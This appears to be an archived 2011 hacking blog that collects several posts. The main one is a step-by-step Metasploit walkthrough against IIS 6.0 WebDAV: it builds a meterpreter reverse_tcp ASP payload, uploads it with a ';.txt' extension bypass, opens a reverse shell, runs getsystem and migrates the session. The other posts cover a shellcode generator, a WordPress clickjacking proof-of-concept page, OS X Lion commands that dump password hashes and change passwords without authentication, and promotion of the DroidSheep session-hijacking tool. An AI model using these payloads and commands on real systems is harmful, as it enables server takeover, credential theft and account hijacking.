Sep 24, 2011

simple-shellcode-generator.py By Didier Stevens

To generate this shellcode with simple-shellcode-generator.py, create a text file (call it createfile.def) with these 2 lines:
 
kernel32.dll CreateFileA str 0x0 0x0 0x0 0x2 0x80 0x0
kernel32.dll CloseHandle eax

Each line in this definition file instructs the generator to generate assembler code to lookup the address of the WIN32 API function, and to call it with the arguments you provide. The first column defines the dll that contains the function to call, the second column is the actual API function, and the rest are arguments to this function. The arguments you provide are copied literally into the generated assembler code, except for 3 keywords.
Keyword int is used to represent any DWORD, it will result in the generation of a push 0×0.
Keyword str is used to reserve space for a string, and the address of the string is used as argument.
Keyword pint is user to reserve space for a DWORD, and the address of the DWORD is used as argument.

To generate our shellcode, issue this command:
simple-shellcode-generator.py -o createfile.asm createfile.def
This generates the following assembler code:
; Shellcode generated by simple-shellcode-generator.py
; Generated for NASM assembler (http://www.nasm.us)
; https://DidierStevens.com
; Use at your own risk
;
; History:
;   2011/09/23: generated

BITS 32

KERNEL32_HASH equ 0x000D4E88
KERNEL32_NUMBER_OF_FUNCTIONS equ 2
KERNEL32_CREATEFILEA_HASH equ 0x00067746
KERNEL32_CLOSEHANDLE_HASH equ 0x00067E1A

segment .text
 call geteip
geteip:
 pop ebx

 ; Setup environment for kernel32.dll
 lea esi, [KERNEL32_FUNCTIONS_TABLE-geteip+ebx]
 push esi
 lea esi, [KERNEL32_HASHES_TABLE-geteip+ebx]
 push esi
 push KERNEL32_NUMBER_OF_FUNCTIONS
 push KERNEL32_HASH
 call LookupFunctions

 ; call to CreateFileA
 push 0x0
 push 0x80
 push 0x2
 push 0x0
 push 0x0
 push 0x0
 lea eax, [STRING1-geteip+ebx]
 push eax
 call [KERNEL32_CREATEFILEA-geteip+ebx]

 ; call to CloseHandle
 push eax
 call [KERNEL32_CLOSEHANDLE-geteip+ebx]

 ret

%include "sc-api-functions.asm"

KERNEL32_HASHES_TABLE:
 dd KERNEL32_CREATEFILEA_HASH
 dd KERNEL32_CLOSEHANDLE_HASH

KERNEL32_FUNCTIONS_TABLE:
KERNEL32_CREATEFILEA dd 0x00000000
KERNEL32_CLOSEHANDLE dd 0x00000000

STRING1: db "String 1", 0
You can replace “String 1″ on line 57 with the file you want to create: “C:\Windows\System32\testfile.txt”.
This shellcode uses the library sc-api-functions.asm you can find in my shellcode repository.

You can download this script from the Source.
Source: http://blog.didierstevens.com/2011/09/23/simple-shellcode-generator-py/


If you like my blog, Please Donate Me

How to undo send in gmail

1-go to google labs and then Gmail labs  
or

 click on the green flask in your Gmail as in image to go directly to the gmail labs


2-and then scroll down page to the feature 

3-Now enable this feature.
After doing all this, You enabled this feature to your gmail account.
send an email and now you will get undo option after sending any email.


Source: http://tricksndtricks.blogspot.com/2011/03/how-to-undo-send-in-gmail.html


If you like my blog, Please Donate Me

Sep 23, 2011

Exploiting Microsoft IIS version 6.0 webDAV with Metasploit (exploit)


BACKGROUND


According to technet.microsoft.com, Web Distributed Authoring and Versioning (WebDAV) extends the HTTP/1.1 protocol to allow clients to publish, lock, and manage resources on the Web.


Integrated into IIS, WebDAV allows clients to do the following:


• Manipulate resources in a WebDAV publishing directory on your server. For example, users who have been assigned the correct rights can copy and move files around in a WebDAV directory.

• Modify properties associated with certain resources. For example, a user can write to and retrieve a file's property information.
• Lock and unlock resources so that multiple users can read a file concurrently. However, only one person can modify the file at a time.
• Search the content and properties of files in a WebDAV directory.

VULNERABILITY


According to cve.mitre.org the WebDAV extension in Microsoft Internet Information Services (IIS) 5.1 and 6.0 allows remote attackers to bypass URI-based protection mechanisms, and list folders or read, create, or modify files, via a %c0%af (Unicode / character) at an arbitrary position in the URI, as demonstrated by inserting %c0%af into a "/protected/" initial pathname component to bypass the password protection on the protected\ folder, aka "IIS 5.1 and 6.0 WebDAV Authentication Bypass Vulnerability," a different vulnerability than CVE-2009-1122.


OPERATING SYSTEMS


The Pentesting Operating System (OS) used is for attack phase:

root@bt$ lsb_release -a


The following exploit was testing using Backtrack 5 Gnome Vmware 32-bit version. Backtrack developers use Ubuntu as you can see below:


No LSB modules are available.

Distributor ID: Ubuntu
Description: Ubuntu 10.04.2 LTS
Release: 10.04
Codename: lucid

Target OS effected:


Windows Server 2003

Windows Server 2003 R2
Windows Server 2003 with SP1

INSTRUCTIONS


First and foremost, log in to backtrack terminal as root user.


Run nmap scan against the target web server to learn about all open ports and the version of application and service version listening on each open port. Likewise, include the option [-O] to detect Operating System (OS) version.


TIP,


By default, Backtrack has NMAP installed and ready to go. However, if you decide to use a regular distribution of Ubuntu, by advised that you will also need to download and install Network Mapper (NMAP) if you don’t have it installed in your system already. Please use the following link to do so:



The command:

root@bt:/#nmap -sV -Pn -A -O -n -p 80,135,139,445,53 [target web server]


For example,


Our Windows 2003 server target IP address is: 192.168.216.156

root@bt:/#nmap -sV -Pn -A -O -n -p 80,135,139,445,53 192.168.110.156


The results of the scan are:


Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-09-18 12:48 EDT

Nmap scan report for 192.168.110.156
Host is up (0.00038s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS
80/tcp open http Microsoft IIS httpd 6.0
| http-methods: Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: UBERSEC Digital Forensics
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
MAC Address: 00:0C:29:ED:A0:96 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 2003
OS details: Microsoft Windows Server 2003 SP1 or SP2
Network Distance: 1 hop
Service Info: OS: Windows

---SNIP--- ---SNIP---


The results can indicate a variety of things. Yet, the one we are looking for is that this server is a Microsoft 2003 server with Microsoft IIS httpd web server version 6.0.


Now we can proceed to our next phase.

root@bt:/#cd /pentest/exploits/framework3


Now load msfconsole from Metasploit v4.0.1-dev

root@bt:/pentest/exploits/framework3#./msfconsole


Now wait for a minute for the module to load…


Once the console has been loaded, type the followings:

msf >use auxiliary/scanner/http/webdav_scanner
msf auxiliary(webdav_scanner) >show options
msf auxiliary(webdav_scanner) >set RHOSTS [target web server IP address]


OR

msf auxiliary(webdav_scanner) >set RHOSTS 192.168.110.156
RHOSTS => 192.168.110.156
msf auxiliary(webdav_scanner) >run


The results of the scan are:


[*] 192.168.110.156 (Microsoft-IIS/6.0) has WEBDAV ENABLED

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The results can also affirm that the target server is a Microsoft IIS Web server version 6.0 that has a WEBDAV service enabled. This is crucial to our exploit attack.


Now let’s perform one more scan:

msf auxiliary(webdav_scanner) > use auxiliary/scanner/http/dir_scanner
msf auxiliary(dir_scanner) >show options
msf auxiliary(webdav_scanner) >set RHOSTS [target web server IP address]


OR

msf auxiliary(dir_scanner) > set RHOSTS 192.168.110.156
RHOSTS => 192.168.110.156
msf auxiliary(dir_scanner) > run


The results of the scan are:


[*] Detecting error code

[*] Using code '404' as not found for 192.168.110.156
[*] Found http://192.168.110.156:80/Pages/ 403 (192.168.110.156)
[*] Found http://192.168.110.156:80/Templates/ 403 (192.168.110.156)
[*] Found http://192.168.110.156:80/ToDo/ 403 (192.168.110.156)
[*] Found http://192.168.110.156:80/_notes/ 403 (192.168.110.156)
[*] Found http://192.168.110.156:80/finance/ 200 (192.168.110.156)
[*] Found http://192.168.110.156:80/form/ 403 (192.168.110.156)
[*] Found http://192.168.110.156:80/images/ 403 (192.168.110.156)
[*] Found http://192.168.110.156:80/pages/ 403 (192.168.110.156)
[*] Found http://192.168.110.156:80/scripts/ 403 (192.168.110.156)
[*] Found http://192.168.110.156:80/templates/ 403 (192.168.110.156)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The Metasploit auxiliary web dir_scanner was able to identify quite few interesting folders with the target web server. However, the line that is the most interesting within the results is the finance folder which corresponds to error code 200. Unlike error code 403 which means that the actions was forbidden, error code 200 in the finance folder means that possibly someone could access the folder externally. Error code 200 is not a good practice without proper authentication. To learn more about error codes, please refer to the following website
http://webmaster.iu.edu/tool_guide_info/errorcodes.shtml

Now let’s browse to the website through our Internet browser by typing http://192.168.110.156:80/finance/ to see the content of the folder:


webdav_1


We can see that ubersec have some files listed for other users to download or view. Let’s go ahead and perform a test to see whether we can upload a file to the /finance folder rather than only downloading.


Now open another terminal window or tab and login as root if needed. Then type the followings.


Create a simple text file by typing:

root@bt:/#echo "You are owned." > hello.txt


Then use the cadaver (Command-Line WebDAV client for unix) tool to connect to the target server /finance folder by typing:

root@bt:/#cadaver http://192.168.110.156/finance


TIP,


If you don’t have cadaver installed on your Ubuntu or Backtrack OS, please type the following command to download that tool.

root@bt:/#apt-get install cadaver


Now put the file that you have created in the /finance folder by typing:

dav:/finance/>put hello.txt


Uploading hello.txt to `/finance/hello.txt':

Progress: [=============================>] 100.0% of 15 bytes succeeded.

Type quit to exit:

dav:/finance/> quit


Connection to `192.168.110.156' closed.


Then let’s browse to the finance folder again once again throughout Internet browser


webdav_2


And now we can see that the file that we uploaded is appearing in the folder among the other files.


Since we were successful uploading the file to the /finance folder, let’s try to exploit the server. For that purpose we will use Metasploit.


Access the Framework folder and type the followings to create our exploit as an ASP.net file:

root@bt:/pentest/exploits/framework#./msfpayload windows/meterpreter/reverse_tcp LHOST=[the local IP address or your hacking machine] LPORT=8443 R | ./msfencode -t asp -o owned.asp


OR

root@bt:/pentest/exploits/framework ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.110.129 LPORT=8443 R | ./msfencode -t asp -o owned.asp


ncode –t asp -o owned.asp

[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

Now type [ls] to list the folder and locate the file that you have created:

root@bt:/pentest/exploits/framework#ls


STOP!!


It is time for testing yourself. View the content of the file by typing:

root@bt:/pentest/exploits/framework#cat owned.asp


buf =

"\xbe\xeb\x20\xee\x30\xd9\xec\xd9\x74\x24\xf4\x58\x33\xc9" +
"\xb1\x49\x31\x70\x14\x83\xe8\xfc\x03\x70\x10\x09\xd5\x12" +
"\xd8\x44\x16\xeb\x19\x36\x9e\x0e\x28\x64\xc4\x5b\x19\xb8" +
"\x8e\x0e\x92\x33\xc2\xba\x21\x31\xcb\xcd\x82\xff\x2d\xe3" +
"\x13\xce\xf1\xaf\xd0\x51\x8e\xad\x04\xb1\xaf\x7d\x59\xb0" +
"\xe8\x60\x92\xe0\xa1\xef\x01\x14\xc5\xb2\x99\x15\x09\xb9" +
"\xa2\x6d\x2c\x7e\x56\xc7\x2f\xaf\xc7\x5c\x67\x57\x63\x3a" +
"\x58\x66\xa0\x59\xa4\x21\xcd\xa9\x5e\xb0\x07\xe0\x9f\x82" +
"\x67\xae\xa1\x2a\x6a\xaf\xe6\x8d\x95\xda\x1c\xee\x28\xdc" +

---SNIP--- ---SNIP---


If you see that type of shellcode (above) then you have done something wrong or you have missed typed something while creating that file with msfpayload & msfencode


But if you get the following code instead,


<%

Sub wfKwCynJSZoH()
fjnwXX=Chr(77)&Chr(90)&Chr(144)&Chr(0)&Chr(3)&Chr(0)&Chr(0)&Chr(0)
&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(255)&Chr(255)&Chr(0)&Chr(0)&Chr(184)
&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&
Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&
Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(232)&Chr(0)&Chr(0)&Chr(0)&Chr(14)&
Chr(31)&Chr(186)&Chr(14)&Chr(0)&Chr(180)&Chr(9)&Chr(205)&Chr(33)&Chr(184)
&Chr(1)&Chr(76)&Chr(205)&Chr(33)&Chr(84)&Chr(104)&Chr(105)&Chr(115)&Chr
(32)&Chr(112)&Chr(114)&Chr(111)&Chr(103)&Chr(114)&Chr(97)&Chr(109)&Chr(32)
&Chr(99)&Chr(97)&Chr(110)&Chr(110)&Chr(111)&Chr(116)&Chr(32)&Chr(98)&Chr(101)

---SNIP--- ---SNIP---


You are ready to rock!


Okay, now connect back to the target WebDAV server using the cadaver command:

root@bt:/#cadaver http://192.168.110.156/finance


Since the target server doesn’t allow us to upload executable web files (such as ASP format), we have to circumvent the server. This is how we are going to do it:

dav:/finance/> put owned.asp owned.txt
Uploading owned.asp to `/finance/owned.txt':
Progress: [=============================>] 100.0% of 1388 bytes succeeded.

dav:/finance/> copy owned.txt owned.asp;.txt

Copying `/finance/owned.txt' to `/finance/owned.asp%3b.txt': succeeded.


Type quit to exit:

dav:/finance/> quit
Connection to `192.168.110.156' closed.


Now, load the msfconsole by typing:

root@bt:/pentest/exploits/framework#./msfconsole


Then type:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST [the IP of your hacking OS]
msf exploit(handler) > set LPORT [Listening port number]


OR


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.110.129
msf exploit(handler) > set LPORT 8443
LPORT => 8443


Now type show options to see your options:

msf exploit(handler) >show options


Module options (exploit/multi/handler):


Name Current Setting Required Description

---- --------------- -------- ----------- ----------------


Payload options (windows/meterpreter/reverse_tcp):


Name Current Setting Required Description

-------- --------------------- ----------- ----------------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST 192.168.110.129 yes The listen address
LPORT 8443 yes The listen port

Exploit target:

Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > set ExitOnSession false

ExitOnSession => false

Now type, exploit –j to start running the exploit:

msf exploit(handler) > exploit -j


[*] Exploit running as background job.

[*] Started reverse handler on 192.168.110.129:8443
[*] Starting the payload handler...
msf exploit(handler) >

Now browse back to the website and click on the file that you manipulated in previous step owned.asp;.txt


http://192.168.110.156/finance/owned.asp;.asp


webdav_3


The file will attempt to get loaded but nothing has happened, or did it?
:-)

Well, go back to your terminal windows right were you have type exploit –j earlier.

Now you should see the followings:

[*] Started reverse handler on 192.168.110.129:8443

[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.110.156
[*] Meterpreter session 1 opened (192.168.110.129:8443 -> 192.168.110.156:1908) at 2011-09-19 15:34:16 -0400

If that is the case, please type sessions and press [ENTER]

msf exploit(handler) >sessions


Active sessions

===========
Id Type Information Connection
-- ---- --------------- ---------------
1 meterpreter x86/win32 192.168.110.129:8443 -> 192.168.110.156:1908

You can see that Metasploit have one session that is active. So lets attempt to connect to it by typing:

msf exploit(handler) > sessions -i 1

[*] Starting interaction with 1...

Now let’s attempt to elevate permission by typing:

meterpreter >getsystem


...got system (via technique 4)


Now type [ps] to see all process running on the target web server

meterpreter >ps


webdav_4


The service that we are interested in is the explorer.exe service. The reason that we care about that service is to allow us to attempt and migrate our session to that service to avoid causing the session to crash and get terminated by the target web server.


Now type migrate and the service process ID. That will allow us to migrate to that service:

meterpreter > migrate 3464


[*] Migrating to 3464...

[*] Migration completed successfully.

Now type shell to get access to the command line on target server:

meterpreter > shell


Process 1264 created.

Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator>


Now create a test file to see if you own the web server

C:\Documents and Settings\Administrator>echo "The server has be exploited" > test.txt


echo "The server has be exploited" > test.txt


C:\Documents and Settings\Administrator>


Now go back to the web server (if you have an access to the server) and open a command line from the run line


webdav_5


You can see that you have successfully gain an access to the server and created a text file


You are done!


You can also download my PDF document for your record from the following link:



ALTERNATIVES


Alternative exploit can be downloaded from exploit-db



REMEDIATION


Please use the following link for managing WebDAV Security (IIS 6.0)




Please use the following link for implementing a secure WebDAV system



Please use the following link to download Microsoft Security tools such as:


Microsoft Security Compliance Manager

Microsoft Baseline Security Analyzer
Microsoft Security Assessment Tool


RESOURCES


Common Vulnerabilities and Exposures CVE-2009-1535



Microsoft Security Bulletin MS09-020 – Important



Installing IIS server and configuring WebDAV




HOW TO: Create and Configure Active Server Pages (ASP) Web Applications in the Windows Server 2003

 


If you like my blog, Please Donate Me

WordPress <= 3.1.2 Clickjacking Vulnerability Advisory

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
        (  .     )
        `)          (
     .     '  . '  `.
     (    , )     (,
  .   `.' ) ('.    ',
   ). , ('.   ( ) (
  (_,) .`), ) _ _,
 /  _____/  / _  \    ____  ____   _____
 \____  \==/ /_\  \ _/ ___\/  _ \ /     \
 /       \/   |    \\  \__(  <_> )  Y Y  \
/______  /\___|__  / \___  >____/|__|_|  /
        \/         \/.-.    \/         \/
                    (x.0)
                  '=.|w|.='
                  _='`"``=.

presents..                              
                                
WordPress Clickjacking Vulnerability Advisory

Product Name            WordPress
Vendor Website          http://www.wordpress.org/
Date Released           September 20th, 2011
Affected Software       WordPress version 3.1.2 and earlier
Researcher              Andrew Horton aka urbanadventurer

+-------------+
| Description |
+-------------+

This advisory is the result of research into how clickjacking can be
leveraged and is the first published clickjacking exploit against a
popular web application to gain OS command execution. WordPress is a web
application used to create a website or blog. The WordPress Admin panel
can be clickjacked to install an arbitrary plugin from the WordPress
plugin archive which leads to arbitrary PHP code installation and
subsequently OS command execution.

Versions of WordPress prior to 3.1.3 are vulnerable to clickjacking.
WordPress has had clickjacking protection since May, 2011 with the
release of version 3.1.3, however no specific threat or exploit has been
published.

Clickjacking is an attack that places an invisible iframe containing a
webpage over top of another, visible webpage. The victim user is lured
into clicking on the invisible iframe to perform an action when they
think they are clicking on the webpage they can see. The iframe on top
is made invisible using the CSS Opacity property, it is placed above
other elements on the webpage by using the CSS Z-Index property, and it
is lined up with the webpage underneath using CSS absolute positioning.

The WordPress Administration panel has an Install Plugin webpage with an
Install Now button that can be clickjacked to install an arbitrary
WordPress plugin from the WordPress plugin archive.

WordPress plugins are ZIP archives with no special requirements.
Installation of a plugin involves unpacking the ZIP archive into the
following folder under the webroot, accessible at the following URL.

WordPress Plugin Installation Location
-----------------------------------
http://wordpress/wp-content/plugins/


+--------------+
| Exploitation |
+--------------+

The ability to install an arbitrary plugin through clickjacking can be
exploited through two methods, one is to submit a trojan horse plugin to
the WordPress plugin archive, the second method is to install a
vulnerable plugin and to subsequently exploit it’s weakness.

The following URL opens the WordPress Plugin Installation web page for
an arbitrary plugin specified in the plugin parameter.

WordPress Clickjacking Exploit Page
-----------------------------------
http://wordpress/wp-admin/plugin-install.php?tab=plugin-information&plugin=wp-gallery-remote

The following proof of concept web page will place an invisible Install
Now button over a read more link. When clicked by a WordPress
administrator, it will install the wp-gallery-remote plugin.

Exploitation involves luring a WordPress administrator, who is currently
logged into the WordPress website, into visiting a malicious webpage
which contains an Install Plugin webpage within an invisible iframe.
The administrator user’s session cookies will be automatically sent to
the WordPress administration panel by the browser. Next the
administrator needs to click on the Install Now button without realizing
the button has been clicked. This causes PHP script content to be
installed in the WordPress website.

WordPress Clickjacking Proof Of Concept
---------------------------------------
<!--
WordPress Example Exploit #1
WordPress versions 3.1.2 and lower are vulnerable.
by Andrew Horton aka urbanadventurer from www.security-assessment.com
-->
<html>
<head><title>Clickjack Exploit for WordPress v1</title></head>
<body>
<style>
#outerdiv {
width:100px; height:30px; overflow:hidden;
z-index:10; opacity:0;
position:absolute; top:135px; left:445px;
}

#inneriframe {
position:absolute; top:-40px; left:-10px; width:200px; height:100px;
border: none;
}
#para { width:650px; }
.clickjack { width:100px; height:30px; position:absolute; top:145px;
left:450px; }
</style>

<h1>WordPress Clickjack Exploit v1</h1>

<p id="para">Lorem ipsum dolor sit amet, consectetur adipisicing elit,
sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut
enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi.</p>
<div class='clickjack'><a href='#'>read more</a></div>

<div id="outerdiv" >
<iframe id="inneriframe" scrolling="no"
src="http://wordpress/wp-admin/plugin-install.php?tab=plugin-information&plugin=wp-gallery-remote&TB_iframe=true&width=640&height=581";>
</iframe>
</div>

<p id="para" style="margin-top:50px;">
An Install Now button is hidden in front of the 'read more' link. When
clicked, this will install a WordPress plugin.
After installation, the user is redirected to a page acknowledging the
new plugin.</p>

<p>The hidden iframe contains : <a
href="http://wordpress/wp-admin/plugin-install.php?tab=plugin-information&plugin=wp-gallery-remote&TB_iframe=true&width=640&height=581";>http://wordpress/wp-admin/plugin-install.php?tab=plugin-information&plugin=wp-gallery-remote&TB_iframe=true&width=640&height=581</a>
</p>

</body>
</html>


This proof of concept page demonstrates the vulnerability but it is not
subtle. It discloses that a plugin has just been installed by
redirecting to a new webpage.


+------------------+
| More Information |
+------------------+

For more information including a realistic exploit demonstration see the
presentation Clickjacking for Shells available at
http://www.youtube.com/watch?v=x4BrnSsrMg8.

Download the proof of concept exploit from:
http://www.morningstarsecurity.com/research/clickjacking-wordpress


+----------+
| Solution |
+----------+

WordPress resolved this issue with foresight in WordPress version 3.1.3,
released in May 2011, by introducing clickjacking protection for the
WordPress admin panel. At the time there was no published clickjacking
threat to WordPress.

More details are available in the WordPress 3.1.3 release notes
http://wordpress.org/news/2011/05/wordpress-3-1-3/


+-------------------------------+
| About Security-Assessment.com |
+-------------------------------+

Security-Assessment.com is Australasia’s leading team of Information
Security consultants specialising in providing high quality Information
Security services to clients throughout the Asia Pacific region. Our
clients include some of the largest globally recognised companies in
areas such as finance, telecommunications, broadcasting, legal and
government. Our aim is to provide the very best independent advice and a
high level of technical expertise while creating long and lasting
professional relationships with our clients.

Security-Assessment.com is committed to security research and
development, and its team continues to identify and responsibly publish
vulnerabilities in public and private software vendor's products.
Members of the Security-Assessment.com R&D team are globally recognised
through their release of whitepapers and presentations related to new
security research.

Attachment: Security-Assessment.com WordPress Clickjacking Exploit.zip

Source: http://seclists.org/fulldisclosure/2011/Sep/219

If you like my blog, Please Donate Me

Sep 22, 2011

Metasploit Spoofing Log Messages.

Description

These modules were developed to aid in testing log management, SIEM, and correlation engines that process syslog messages. These modules can also be used to generate mocked up scenarios to test incident response processes, teams and SOC analysts without having to perform real attacks on critical resources or other systems.

syslog_spoof_custom_message.rb - Basically allows you to spoof custom syslog messages to and from a single host or a range of hosts. Syslog messages are supplied as a variable when the module is ran in Metasploit.

syslog_spoof_log_file.rb - Basically allows you to spoof Syslog messages read from a log file to and from single hosts or a range of hosts. There are numerous on the fly substitutions/replacements that can be made by setting the advanced options in this module. The TIMESTAMP_REPLACE advanced option has many of the common timestamp formats already specified and will allow you to simply choose from a list to replace them with the current timestamp, which can be useful in replaying old log files. The SRCIP_REPLACE advanced option will replace any occurrence of the text string “src_ip” within in the log message with the spoofed source IP, which can be useful for spoofing message from multiple source IPs using the same log file. You have to edit the log file with the text string “src_ip” before playing the logs with this module when utilizing the advanced option SRCIP_REPLACE. The REGEX_REPLACE advanced option will allow you to replace any arbitrary text string within the log message by specifying a regular expression or string, which is useful for changing things like user names within the log message itself.

syslog_spoof_custom_message.rb (4.1 kB) Jeremy Conway, 09/20/2011 11:08 am

syslog_spoof_log_file.rb (8.5 kB) Jeremy Conway, 09/20/2011 11:08 am

If you like my blog, Please Donate Me

Sep 20, 2011

Cracking OS X Lion Passwords

When it comes to Lion, the general premise is the same (albeit a few technical differences). Each user has their own shadow file, with each shadow file stored under a .plist file located in /var/db/dslocal/nodes/Default/users/.

The interesting thing when it comes to Lion's implementation, however, is privilege. As mentioned above, all OS X versions are using shadow files. For the unfamiliar, a shadow file is that which can only be accessed by users with a high privilege (typically root). So for all modern OS X platforms (Tiger, Leopord, Snow Leapord and Lion) each user has their own shadow file (hash database) whose data is accessible only by the root user… or at least it should be.

It appears in the redesign of OS X Lion's authentication scheme a critical step has been overlooked. Whilst non-root users are unable to access the shadow files directly, Lion actually provides non-root users the ability to still view password hash data. This is accomplished by extracting the data straight from Directory Services.

If we invoke a a directory services listing on user bob by specifying the /Local/ path we can see bob's standard profile information:


$ dscl localhost -read /Local/Default/Users/bob

This provides us with nothing too exciting. However, if we invoke the directory services listing using the /Search/ path, we see a different result:

$ dscl localhost -read /Search/Users/bob

From the output, we can see the following data:

dsAttrTypeNative:ShadowHashData:

62706c69 73743030 d101025d 53414c54 45442d53 48413531 324f1044 74911f72 3bd2f66a 3255e0af 4b85c639 776d510b 63f0b939 c432ab6e 082286c4 7586f19b 4e2f3aab 74229ae1 24ccb11e 916a7a1c 9b29c64b d6b0fd6c bd22e7b1 f0ba1673 080b1900 00000000 00010100 00000000 00000300 00000000 00000000 00000000 000060

Note: The SHA512 hash is stored from bytes 32-96 (green) and the salt is stored from bytes 28-31(red). For more information on these hashes please see this thread.

This ShadowHashData attribute actually contains the same hash stored in user bob's shadow .plist file. The interesting thing about this? root privileges are not required. All users on the system, regardless of privilege, have the ability to access the ShadowHashData attribute from any other user's profile.

Due to Lions relatively short time on the market, I am yet to find any of the major crackers supporting OS X Lion hashes (SHA512 + 4-byte salt). To simplify the cracking of these hashes I have created a simple python script which can be downloaded here.

Now, if the password is not found by the dictionary file you're out of luck, right? Well, no! Why crack hashes when you can just change the password directly! It appears Directory Services in Lion no longer requires authentication when requesting a password change for the current user. So, in order to change the password of the currently logged in user, simply use:

$ dscl localhost -passwd /Search/Users/bob

And voilà! You will be prompted to enter a new password without the need to authenticate.


Source: http://www.defenceindepth.net/2011/09/cracking-os-x-lion-passwords.html


If you like my blog, Please Donate Me

Sep 19, 2011

DroidSheep. [ Session Hijacking Tool On Android]

What is this about?
If you know Firesheep or Faceniff, you probably know what this is about – one-click session hijacking using your android smartphone or tablet computer.

If you do not know one of these tools, I’ll try to explain what DroidSheep is.
Maybe you know Bob. Bob is a wellknown person and Bob loves coffee. Every morning, he takes his laptop and visits one the famous green coffee bars, has a “grande vanilla latte” and writes messages to his facebook friends. For doing that, Bob uses the coffee bars WiFi – because it´s free and fast.
One Morning, Bob is just writing a message to his girlfriend, Eve enters the coffee bar. Eve has an Android phone and Eve uses DroidSheep. After ordering a “venti caramel macchiato”, Eve sits down, takes her phone and starts browsing facebook. Using Bobs identity. She can watch at his friends. Read his messages. Write messages. Write wall posts. Remove friends. Delete Bobs account. Without getting ever in touch with Bob.
What happened?
When Bob is using the WiFi, his laptop sends all the data intended to be received by facebook, over the air to the coffee bars wireless router. As “over the air” means “captureable by everybody”, Eve (or her phone) can read all the data sent by Bob. As some data is encrypted before being sent, she cannot read Bobs facebook password, but in order not to make Bob enter his password after each click, facebook sends Bob a so called “session id” after logging in, which Bob sends with each interaction, making it possible for facebook to identify Bob. Usually only Bob knows this id, as he receives it encrypted. But when Bob uses the coffee bars WiFi, he spreads his session id over the air to everybody. So Eve takes this session id and uses it as hers – and facebook cannot determine, if Bob or Eve uses this id.
DroidSheep makes it easy to use for everybody. Just start DroidSheep, click the START button and wait until someone uses one of the supported websites. Jumping on his session simply needs one more click. That´s it.
What do you need to run DroidSheep?
- You need an android-powered device, running at least version 2.1 of Android
- You need Root-Access on your phone (link)
- You need DroidSheep :-) (You can get it in the “GET IT” section)

DroidSheep now supports nearly all Websites using Cookies!
With Version 5, DroidSheep got the new “generic”-Mode! Simply enable it, and DroidSheep will capture all Accounts in the network!!
Successfully tested with ALL already supported Accounts and a lot of other ones (even all WordPress and Joomla-Pages should work!!)

Which pages does DroidSheep support?
- amazon.de

– facebook.com

– fl ickr.com

– twitter.com

– linkedin.com

– yahoo.com

– live.com

– google.de (only the non-encrypted services like “maps”)

Limitations
DroidSheep now supports OPEN, WEP, WPA and WPA2 secured networks.
For WPA/WPA2 it uses an DNS-Spoofing attack.
DNS-Spoofing, means it makes all devices within the network think, the DroisSheep-device is the router and sending their data to the device. This might have an impact to the network and cause connection problems or bandwith-limitations – and it can be spotted. DroidSheeps attack can not, as it only reads the packets sent over the WiFi, but instead of dismissing them, it uses the data :-)

How does this work?
When you use web applications, they usually require you to enter your credentials in order to verify your identity. To avoid entering the credentials at every action you do, most web applications use sessions where you need to log-in once. A sessions gets identified by a session token which is in possession of the user and is sent together with any subsequent request within the HTTP packets.
DroidSheep reads all the packets sent via the wireless network and captures this session token, what allows you to use this session token as yours and make the web application think you are the person identified by this token. There is no possibility for the server to determine if you’re the correct person or not.

DroidSheep is NOT INTENDED TO STEAL IDENTITIES.
It shall show the weak security properties of big websites just like Facebook. Please be always aware of what you’re doing.
I AM NOT RESPONSIBLE FOR ANY DAMAGES THAT HAPPEN BY USING THIS SOFTWARE!


Source: http://droidsheep.de/


If you like my blog, Please Donate Me

PoC: Hacking Facebook with HTML5 By @skeptic_fx

Facebook Graph API Access Token Stealing : Long live UI-Redressing

A week after my first Facebook bounty  , i found another place where Facebook did the same mistake of not busting IFrames.And guess what , its another whole domain developers.facebook.com.It includes all the documentation and examples for using the Facebook Graph API and other products like the Legacy REST API , FQL , Chat API . An attacker can do a whole lot of stuff with this once he Iframes this.

I decided to write on one of the attacks that is possible with this bug. As we all know, the documentation includes some real good examples for using the API with some nifty access tokens with the credentials of the currently logged in user. This special token in the documentation comes with some extra special rights like read_stream, user_status, user_birthday, user_relationships and much more rights which even your normal friends can't see. 

Stealing the Access Token :
